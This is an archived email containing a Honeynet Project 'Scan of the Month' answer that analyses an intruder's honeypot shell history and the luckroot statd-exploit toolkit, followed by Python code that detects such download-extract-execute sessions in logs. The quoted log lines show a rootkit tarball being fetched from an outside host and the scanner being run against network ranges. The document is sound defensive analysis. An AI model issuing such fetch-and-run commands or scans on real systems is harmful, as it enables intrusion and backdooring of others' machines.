From muddafugga@lvcm.com Sat Mar 17 20:02:41 2001
Date: Sun, 11 Mar 2001 04:04:40 -0800
From: Ed Brandwein
To: Lance Spitzner
Subject: Re: your mail

Here you go.

#
# SCAN OF THE MONTH #13: March, 2001

1. What is the blackhat attempting to do with his command line syntax?

Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail
Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR

After finding the desired directory, blackhat uses lynx to download LUCKROOT.TAR.

Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR

After 3 false starts, blackhat strips the tar ball, extracting downloaded files.

Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120

Blackhat goes to the newly created directory and begins scanning specified networks using the luckgo script.

2. What does the tool accomplish?

The tool probes/exploits vulnerable RedHat 6.2 boxes, installs a rootkit.

3. How does the tool work?

* The Luckgo script (calling luckscan-a, a statd scanner referred to as scaner-h4x0r) probes for vulnerable systems (looking to exploit rpc.statd on Redhat 6.2) in the networks specified interactively by the user.
* When vulnerable boxes are found, the luckstatdx program is called to exploit rpc.statd and gain root access; it downloads and opens a rootkit (xzibit.tar), then removes traces of the rootkit installation.

4. Is this tool a worm, or would you classify it as something else?

This tool is not self-propagating, so it does not qualify as a worm. It is probably more accurate to classify this as a trojan/scanner because after probing for vulnerable systems and gaining root access it then trojanizes services.

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

This tool is similar to the Ramen worm.

* It uses a modification of the statdx tool by Ron1n. In the modification, the rootkit is downloaded, the tar ball is ripped and the tar files are deleted.
* This tool is directed at Redhat version 6.2 only, whereas Ramen can be directed at various versions of RedHat.
* Like the Ramen worm it scans for vulnerable systems, but on user-specified, not random, networks.
* Unlike Ramen it is not self-propagating.
* Ramen closes the remote vulnerabilities that it used and does not appear to leave a direct backdoor into the system. Luckgo does leave a backdoor for remote access to services.
* Both open the same backdoor port (39168).

Bonus Question: What information can you obtain about who is using or created the tool?

The author's alias appears to be beCyS with assists from ReSpEkT, based on comments in the code.

The site providing the downloads (becys.org) resolves to IP 64.176.171.107 which is registered to:

Alabanza, Inc. (NETBLK-ALABANZA-BALT-4)
8309 Tinsley Rd.
Baltimore, MD 21244
US

Netname: ALABANZA-BALT-4
Netblock: 64.176.0.0 - 64.177.255.255
Maintainer: ALAB

Coordinator:
Cunningham, Thomas (TC12-ARIN) ipadmin@alabanza.com
410-779-1400

A visit to the becys.org website yields only a screen with the words "beCys Organization" with View - Source not enabled. Alabanza.com is the home of an automated webhosting company.
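The analysis in question 1 above reconstructs the intruder's session by hand from the honeypot's bash HISTORY syslog lines. The following is an added example (not part of the submission or of the Honeynet Project's tooling) that does the same reconstruction programmatically: it parses lines in that syslog format, groups them per shell PID, and flags a session in which a download, a tar extraction and execution of a freshly unpacked local binary occur in that order, noting whether the session ran as UID 0 and whether it changed into a dot-directory. The sample input is the log excerpt quoted in the submission; the list of downloader program names and the tag names are this example's own assumptions, not anything from the original page.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: the bash HISTORY syslog lines quoted in the submission.
SAMPLE_LOG = """\
Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail
Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
"""

# One syslog line: "<Mon> <day> <hh:mm:ss> <host> <shell>: HISTORY: PID=<n> UID=<n> <command>"
LINE_RE = re.compile(
    r"^(?P<month>\w{3})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+"
    r"(?P<host>\S+)\s+\S+:\s+HISTORY:\s+PID=(?P<pid>\d+)\s+UID=(?P<uid>\d+)\s+(?P<cmd>.*)$"
)

# Assumed list of interactive/CLI fetchers to treat as "download" (this example's choice).
DOWNLOADERS = {"lynx", "wget", "curl", "ftp", "ncftp"}
# A path component beginning with '.' (e.g. ".mail", "/usr/sbin/.mail").
HIDDEN_DIR_RE = re.compile(r"(^|/)\.[^/\s]+")


@dataclass
class HistoryEvent:
    timestamp: str   # "Mon day hh:mm:ss" as logged (no year in syslog)
    host: str
    pid: int
    uid: int
    command: str


def parse_history(text):
    """Parse bash HISTORY syslog lines; lines in any other format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append(HistoryEvent(
            timestamp=f"{m['month']} {m['day']} {m['time']}",
            host=m["host"], pid=int(m["pid"]), uid=int(m["uid"]),
            command=m["cmd"].strip(),
        ))
    return events


def classify(cmd):
    """Return the set of tags (assumed names) that describe one shell command."""
    argv = cmd.split()
    if not argv:
        return set()
    tags = set()
    prog = argv[0]
    if prog in DOWNLOADERS:
        tags.add("download")
    # Any tar invocation whose option cluster contains 'x' is an extraction.
    if prog == "tar" and any("x" in a for a in argv[1:] if a.startswith("-")):
        tags.add("extract")
    if prog.startswith("./"):
        tags.add("exec_local")
    if prog == "cd" and len(argv) > 1 and HIDDEN_DIR_RE.search(argv[1]):
        tags.add("hidden_dir")
    return tags


def find_toolkit_sequences(events):
    """Per (host, pid) session, report download -> extract -> exec_local in that order."""
    sessions = defaultdict(list)
    for e in events:
        sessions[(e.host, e.pid)].append(e)   # input is assumed chronological

    stages = ["download", "extract", "exec_local"]
    findings = []
    for (host, pid), evs in sessions.items():
        stage, hits = 0, []
        for e in evs:
            if stage < len(stages) and stages[stage] in classify(e.command):
                hits.append(e)
                stage += 1
        if stage == len(stages):
            findings.append({
                "host": host, "pid": pid, "uid": evs[0].uid,
                "root": evs[0].uid == 0,
                "hidden_dir": any("hidden_dir" in classify(e.command) for e in evs),
                "download": hits[0].command,
                "extract": hits[1].command,
                "exec": hits[2].command,
                "first_seen": hits[0].timestamp, "last_seen": hits[2].timestamp,
            })
    return findings


if __name__ == "__main__":
    for f in find_toolkit_sequences(parse_history(SAMPLE_LOG)):
        print(f)
```

Run against the quoted excerpt, the single session for PID 1246 is reported with the lynx fetch, the first `tar -x...` attempt and the first `./luckgo` run as its three stages, plus `root` and `hidden_dir` both true; a benign session (an `ls` as UID 500, say) produces nothing. On a real honeypot the same logic runs over the full syslog stream, and the per-PID grouping is what keeps interleaved shells from different logins apart.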